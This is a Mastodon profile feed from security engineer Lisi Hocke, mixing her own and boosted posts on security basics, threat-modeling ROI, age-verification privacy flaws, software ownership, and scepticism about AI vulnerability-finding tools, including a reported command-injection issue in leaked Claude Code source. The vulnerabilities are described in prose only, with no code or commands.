Lisi Hocke

@lisihocke
1.4K Followers
928 Following
10.1K Posts

security engineer, holistic tester, quality enabler, agile experimenter, sociotechnical symmathecist, team glue. volleyball player, game lover, story escapist. she/her.

#tech #security #CyberSecurity #SecurityEngineering #ProdSec #AppSec #DevSecOps #testing #quality #development #software #collaboration #pairing #EnsembleProgramming #EnsembleTesting #SoftwareTeaming #agile #experimenting #sociotechnical

Pronounsshe/her
Websitehttps://www.lisihocke.com
Linktreehttps://linktr.ee/lisihocke
Completely boring take on IT security in the age of AI-discovered security vulnerabilities: Everything in IT security that was a good idea before is still a good idea. When security updates are available, install them. Reduce attack surface, avoid unnecessary complexity. Don't reuse passwords.

Kymberlee Price uses her experience with secure design engineering practices to suggest ways to measure the ROI of threat modeling that track impact, not just activity, in our latest blog post .

https://shostack.org/blog/roi-of-threat-modeling/

Shostack + Friends Blog > Measuring the ROI of threat modeling: moving from activity to impact

Shostack + Associates COO Kymberlee Price shares her experience measuring the impact of secure design engineering practices on security outcomes

Hackers Expose The Massive Surveillance Stack Hiding Inside Your “Age Verification” Check

"We've been saying this for years now, and we're going to keep saying it until the message finally sinks in: mandatory age verification creates massive, centralized honeypots of sensitive biometric data that will inevitably be breached.

Link: https://www.techdirt.com/2026/02/25/hackers-expose-the-massive-surveillance-stack-hiding-inside-your-age-verification-check/

#linkdump #blogpost #surveillance

Hackers Expose The Massive Surveillance Stack Hiding Inside Your “Age Verification” Check

We’ve been saying this for years now, and we’re going to keep saying it until the message finally sinks in: mandatory age verification creates massive, centralized honeypots of sensitiv…

Techdirt
Picard management tip: Study history. The answers are there.

Wenn das dein erster Besuch auf dem SWEC oder einem Open Space ist haben wir fĂĽr Dich die vier Leitprinzipien zusammengefasst.

Um das meiste aus deinem Besuch herauszuholen, folge am besten dem "Law of Movement" und sei Du selbst indem Du dich auf die Art einbringst wie du Dich wohl fĂĽhlst.

#swec #swec26

Possibly controversial take....

Software systems need clear, cohesive, continuous ownership/accountability. This applies to:
* running applications that require operational support
* software libraries and frameworks that are "merely" used by other applications
* company internal apps, OSS libraries, and everything in between

If there isn't a specific team, led by a specific person, owning the system, then there is an accountability problem. Things will go wrong. Fingers will point.

Massive love out to @kentbeck . You are an inspiration and so much of what I believe about #programming comes from your work.

https://tidyfirst.substack.com/p/parkinsons

#extremeprogramming #XP

Parkinson's

Not trying to be subtle here

Software Design: Tidy First?

Embarrassing times for the European Commission after security researchers found flaws within minutes of using its age verification app. https://www.politico.eu/article/eu-brussels-launched-age-checking-app-hackers-say-took-them-2-minutes-break-it/

(ICYMI: I have a blog post on why age verification laws are a bad idea to begin with: https://this.weekinsecurity.com/papers-please-age-verification-laws-threaten-everyones-online-security-and-privacy/)

Brussels launched an age checking app. Hackers say it takes 2 minutes to break it.

Cyber experts say they have found holes in Brussels’ age verification app, despite claims by the EU executive that it is “technically ready.”

POLITICO

A few notes about the massive hype surrounding Claude Mythos:

The old hype strategy of 'we made a thing and it's too dangerous to release' has been done since GPT-2. Anyone who still falls for it should not be trusted to have sensible opinions on any subject.

Even their public (cherry picked to look impressive) numbers for the cost per vulnerability are high. The problem with static analysis of any kind is that the false positive rates are high. Dynamic analysis can be sound but not complete, static analysis can be complete but not sound. That's the tradeoff. Coverity is free for open source projects and finds large numbers of things that might be bugs, including a lot that really are. Very few projects have the resources to triage all of these. If the money spent on Mythos had been invested in triaging the reports from existing tools, it would have done a lot more good for the ecosystem.

I recently received a 'comprehensive code audit' on one of my projects from an Anthropic user. Of the top ten bugs it reported, only one was important to fix (and should have been caught in code review, but was 15-year-old code from back when I was the only contributor and so there was no code review). Of the rest, a small number were technically bugs but were almost impossible to trigger (even deliberately). Half were false positives and two were not bugs and came with proposed 'fixes' that would have introduced performance regressions on performance-critical paths. But all of them looked plausible. And, unless you understood the environment in which the code runs and the things for which it's optimised very well, I can well imaging you'd just deploy those 'fixes' and wonder why performance was worse. Possibly Mythos is orders of magnitude better, but I doubt it.

This mirrors what we've seen with the public Mythos disclosures. One, for example, was complaining about a missing bounds check, yet every caller of the function did the bounds check and so introducing it just cost performance and didn't fix a bug. And, once again, remember that this is from the cherry-picked list that Anthropic chose to make their tool look good.

I don't doubt that LLMs can find some bugs other tools don't find, but that isn't new in the industry. Coverity, when it launched, found a lot of bugs nothing else found. When fuzzing became cheap and easy, it found a load of bugs. Valgrind and address sanitiser both caused spikes in bug discovery when they were released and deployed for the first time.

The one thing where Mythos is better than existing static analysers is that it can (if you burn enough money) generate test cases that trigger the bug. This is possible and cheaper with guided fuzzing but no one does it because burning 10% of the money that Mythos would cost is too expensive for most projects.

The source code for Claude Code was leaked a couple of weeks ago. It is staggeringly bad. I have never seen such low-quality code in production before. It contained things I'd have failed a first-year undergrad for writing. And, apparently, most of this is written with Claude Code itself.

But the most relevant part is that it contained three critical command-injection vulnerabilities.

These are the kind of things that static analysis should be catching. And, apparently at least one of the following is true:

  • Mythos didn't catch them.
  • Mythos doesn't work well enough for Anthropic to bother using it on their own code.
  • Mythos did catch them but the false-positive rate is so high that no one was able to find the important bugs in the flood of useless ones.

TL;DR: If you're willing to spend half as much money Mythos costs to operate, you can probably do a lot better with existing tools.

Anthropic Claude Code Leak Reveals Critical Command Injection Vulnerabilities

Anthropic's Claude Code CLI contains three critical command injection vulnerabilities that allow attackers to execute arbitrary code and exfiltrate cloud credentials via environment variables, file paths, and authentication helpers. These flaws bypass the tool's internal sandbox and are particularly dangerous in CI/CD environments where trust dialogs are disabled.

BeyondMachines